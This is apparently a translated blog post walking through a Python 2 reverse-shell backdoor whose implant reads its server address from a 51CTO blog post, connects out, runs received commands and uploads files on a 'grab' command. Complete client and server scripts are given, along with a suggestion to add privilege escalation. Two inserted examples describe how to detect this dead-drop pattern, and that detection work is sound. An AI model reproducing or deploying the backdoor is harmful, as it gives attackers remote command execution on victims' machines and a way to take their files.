For technical exchange only.
Besides 51CTO, other platforms such as Weibo could of course be used as well; this post uses 51CTO.
Idea: suppose we have placed a Trojan on a machine. Inside it we write our own server IP, but our IP may change. A domain name would certainly solve this, but that is not very elegant, and domain names cost money, so we need an intermediary!
First, what a reverse shell is: the attacked host may restrict inbound traffic, for example allowing connections to only one port and blocking everything else. In that case the attacked host has to connect out to our server; our server just listens on a port and waits for the attacked host to connect.
Implementation principle:
The target host fetches a 51CTO web page to obtain the server IP and port it needs to connect to.
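The principle above is, from a defender's point of view, the "dead drop resolver" pattern: a process first fetches a public blog page and only then opens its outbound connection. The following added example (not code from the original post) shows how to spot that sequence in endpoint connection telemetry. The log lines, the list of dead-drop domains and the alert format are all constructed for the example; the assumed rule is "a process contacts a known blog or paste host over HTTP(S) and, within a short window, the same process connects to a raw IP on a non-web port".

```python
"""Detect the dead-drop-resolver sequence in constructed endpoint telemetry."""
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional

# Constructed sample telemetry (not real data): timestamp host pid process event destination:port
SAMPLE_LOG = """\
2016-02-01T10:00:01 ws01 4120 python.exe connect youerning.blog.51cto.com:80
2016-02-01T10:00:03 ws01 4120 python.exe connect 203.0.113.10:4444
2016-02-01T10:00:05 ws02 880 chrome.exe connect youerning.blog.51cto.com:80
2016-02-01T10:00:06 ws02 880 chrome.exe connect s2.51cto.com:443
2016-02-01T10:09:00 ws03 2200 python.exe connect pastebin.com:443
2016-02-01T10:20:00 ws03 2200 python.exe connect 198.51.100.7:8080
"""

# Public content hosts that could serve as a dead drop (assumed list for the example).
DEAD_DROP_SUFFIXES = ("51cto.com", "pastebin.com")
WEB_PORTS = {80, 443}


class ConnEvent(NamedTuple):
    ts: datetime
    host: str
    pid: int
    proc: str
    dst: str
    port: int


def parse_line(line: str) -> Optional[ConnEvent]:
    """Parse one constructed telemetry line; return None for anything that is not a connect event."""
    parts = line.split()
    if len(parts) != 6 or parts[4] != "connect":
        return None
    dst, port = parts[5].rsplit(":", 1)
    return ConnEvent(datetime.fromisoformat(parts[0]), parts[1], int(parts[2]), parts[3], dst, int(port))


def is_dead_drop(ev: ConnEvent) -> bool:
    """A web-port connection to one of the public content hosts."""
    return ev.port in WEB_PORTS and ev.dst.endswith(DEAD_DROP_SUFFIXES)


def looks_like_ip(dst: str) -> bool:
    """True for a dotted-quad IPv4 literal (the backdoor above connects to a bare IP, not a name)."""
    octets = dst.split(".")
    return len(octets) == 4 and all(o.isdigit() and 0 <= int(o) <= 255 for o in octets)


def find_dead_drop_followups(log: str, window_seconds: int = 60) -> List[Dict]:
    """Return one alert per (host, pid) that fetched a dead-drop page and then, within
    window_seconds, connected to a raw IP on a non-web port."""
    events = [ev for ev in map(parse_line, log.splitlines()) if ev]
    last_fetch: Dict[tuple, ConnEvent] = {}   # (host, pid) -> most recent dead-drop fetch
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.host, ev.pid)
        if is_dead_drop(ev):
            last_fetch[key] = ev
        elif key in last_fetch and ev.port not in WEB_PORTS and looks_like_ip(ev.dst):
            fetch = last_fetch[key]
            delay = (ev.ts - fetch.ts).total_seconds()
            if delay <= window_seconds:
                alerts.append({"host": ev.host, "pid": ev.pid, "proc": ev.proc,
                               "dead_drop": f"{fetch.dst}:{fetch.port}",
                               "callback": f"{ev.dst}:{ev.port}",
                               "delay_s": delay})
                del last_fetch[key]   # one alert per fetch
    return alerts


if __name__ == "__main__":
    for alert in find_dead_drop_followups(SAMPLE_LOG):
        print(alert)
```

On the sample data only ws01 is flagged: the browser on ws02 only ever talks to web ports, and ws03's callback arrives outside the default 60-second window (widen the window and it is flagged too). The point for egress policy is the same one the post makes from the other side: because the implant connects out on an arbitrary port, outbound filtering and per-process connection logging are what expose it.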
How to achieve it?
Note: because this is for educational purposes only, there are no advanced features (and I couldn't write them anyway); this is just a simple TCP client and TCP server.
First, create a simple TCP server (Python 2) that listens for the connecting TCP client.
```python
#coding: utf-8
import socket

IP = "0.0.0.0"   # placeholder: the address to bind
PORT = 9999      # placeholder: the port to bind


def connect():
    ### Create the socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ### Bind the IP and port
    s.bind((IP, PORT))
    ### Allow one queued connection; set this as you like
    s.listen(1)
    ### Call accept and wait for the client
    conn, addr = s.accept()
    ### Print the client connection info; addr is an (IP, port) tuple
    print "---> we got a connection from: ", addr
    ### Loop: read a command, send it, print the reply
    while True:
        command = raw_input("shell>")
        ### If the command contains the keyword exit, close the connection
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        else:
            conn.send(command)
            print conn.recv(1024)


def main():
    connect()


if __name__ == '__main__':
    main()
```
Then create a TCP client that connects to the TCP server.
```python
import socket
import subprocess
import os

host = "192.0.2.1"   # placeholder: the server-side IP
port = 9999          # placeholder: the server port


def connect(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        else:
            ### The command sent by the server is executed through subprocess
            cmd = subprocess.Popen(command, shell=True,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE,
                                   stdin=subprocess.PIPE)
            ### Send back standard output and standard error
            s.send(cmd.stdout.read())
            s.send(cmd.stderr.read())


def main():
    connect(host, port)


if __name__ == '__main__':
    main()
```
Because the client does not check whether the server is reachable (it simply connects once), start the server first and then run the client.
At this point, the first step is complete.
Now we need to put the server IP and port on the 51CTO blog.
Create a blog post whose body is a JSON object containing the host and port (the code below expects the keys "host" and "port").
Then use the two libraries requests and BeautifulSoup to extract the information we want.
```python
import requests
import json
from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"
```
Before scraping, inspect the page a little first.
Using Chrome's developer tools we locate the element that holds the post body: a div with class "artcontent mt10". That is the information we want. Of course, BeautifulSoup offers many ways to filter out the information we need; this is just one of them.
```python
def gethost(url):
    ret = requests.get(url).content
    soup = BeautifulSoup(ret, "html.parser")
    for i in soup.find_all("div", class_="artcontent mt10"):
        ### i.string is None when the div has child elements, so check it first
        if i.string and i.string.startswith("{"):
            ret = json.loads(str(i.string))
            return ret["host"], ret["port"]


print gethost(url)
```
Running this prints the (host, port) tuple parsed from the post.
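The same shape that gethost() looks for, a post body that is nothing but a JSON object naming a host and a port, is what a blog platform's moderation hook or a web proxy's content inspection can flag. The added example below (not code from the original post) does that with only the standard library. The class name "artcontent mt10" comes from the post; the HTML document and the matching rule (a whole element body that parses as a JSON object with "host" and "port" keys) are constructed for the example.

```python
"""Flag article bodies that consist of a bare JSON host/port object (constructed example)."""
import json
from html.parser import HTMLParser
from typing import Dict, List

# Constructed HTML resembling a blog listing; the second div is the planted config.
SAMPLE_HTML = """
<html><body>
<div class="artcontent mt10"><p>Normal post text, nothing to see.</p></div>
<div class="artcontent mt10">{"host": "203.0.113.10", "port": 4444}</div>
<div class="artcontent mt10">{"title": "not a config"}</div>
<div class="sidebar">{"host": "ignored", "port": 1}</div>
</body></html>
"""


class ArticleTextCollector(HTMLParser):
    """Collect the text content of every element whose class attribute equals target_class.

    Assumes well-formed, explicitly closed tags inside the article element, which is
    enough for the constructed sample.
    """

    def __init__(self, target_class: str):
        super().__init__()
        self.target_class = target_class
        self.depth = 0                  # > 0 while inside a target element
        self.current: List[str] = []
        self.bodies: List[str] = []

    def handle_starttag(self, tag, attrs):
        if self.depth:
            self.depth += 1             # nested element inside the article
        elif ("class", self.target_class) in attrs:
            self.depth = 1
            self.current = []

    def handle_endtag(self, tag):
        if self.depth:
            self.depth -= 1
            if self.depth == 0:
                self.bodies.append("".join(self.current).strip())

    def handle_data(self, data):
        if self.depth:
            self.current.append(data)


def find_planted_configs(html: str, article_class: str = "artcontent mt10") -> List[Dict]:
    """Return the host/port pairs found in article bodies that are bare JSON objects."""
    parser = ArticleTextCollector(article_class)
    parser.feed(html)
    hits: List[Dict] = []
    for body in parser.bodies:
        if not body.startswith("{"):
            continue
        try:
            obj = json.loads(body)
        except ValueError:
            continue
        if isinstance(obj, dict) and "host" in obj and "port" in obj:
            hits.append({"host": obj["host"], "port": obj["port"]})
    return hits


if __name__ == "__main__":
    print(find_planted_configs(SAMPLE_HTML))
```

Only the second div is reported: the first is ordinary text, the third is JSON without the host/port keys, and the sidebar div has a different class. A real deployment would want a looser rule (JSON embedded in longer text, base64-wrapped objects), but the narrow check already catches the exact layout this post relies on.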
At this point the second part is complete. The complete code (both scripts are Python 2) follows.
Client .py file
```python
import socket
import subprocess
import os
import requests
import json
from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"


def transfer(s, path):
    ### Send the file at path in 1024-byte chunks, then the in-band "Done" marker
    if os.path.exists(path):
        f = open(path, "rb")
        packet = f.read(1024)
        while packet != "":
            s.send(packet)
            packet = f.read(1024)
        s.send("Done")
        f.close()
    else:
        ### The server's transfer() looks for this string when the file is missing
        s.send("unable to find out the file")


def gethost(url):
    ### Fetch the blog page and pull the JSON object out of the post body
    ret = requests.get(url).content
    soup = BeautifulSoup(ret, "html.parser")
    for i in soup.find_all("div", class_="artcontent mt10"):
        if i.string and i.string.startswith("{"):
            ret = json.loads(str(i.string))
            return ret["host"], ret["port"]


def connect(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        elif "grab" in command:
            ### Command format is "grab*<path>"
            grab, path = command.split("*")
            try:
                transfer(s, path)
            except Exception, e:
                s.send(str(e))
        else:
            cmd = subprocess.Popen(command, shell=True,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE,
                                   stdin=subprocess.PIPE)
            s.send(cmd.stdout.read())
            s.send(cmd.stderr.read())


def main():
    host, port = gethost(url)
    connect(host, port)


main()
```
Server-side .py file
```python
#coding:utf-8
import socket

ip = "0.0.0.0"   # placeholder: your IP (the address to bind)
port = 9999      # placeholder: the port to bind


def transfer(conn, command):
    ### Forward the grab command, then receive the file into text.text
    conn.send(command)
    f = open("text.text", "wb")
    while True:
        bits = conn.recv(1024)
        if "unable to find out the file" in bits:
            print "---- unable to find the file"
            break
        if bits.endswith("Done"):
            ### "Done" is an in-band marker: any file data that arrives in the
            ### same chunk as the marker is not written
            print "Done"
            break
        f.write(bits)
    f.close()


def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    conn, addr = s.accept()
    print "---> we got a connection from: ", addr
    while True:
        command = raw_input("shell>")
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        elif "grab" in command:
            transfer(conn, command)
        else:
            conn.send(command)
            print conn.recv(1024)


def main():
    connect()


main()
```
PostScript: the two complete Python scripts add a transfer function for sending files, as an easter egg, although I don't know what the point of an easter egg is. Many more functions could be added, such as searching for files, privilege escalation, and so on.
This article is from the "Ear Notebook" blog; please keep this source: http://youerning.blog.51cto.com/10513771/1740646
Python reverse shell backdoor bound to a 51CTO blog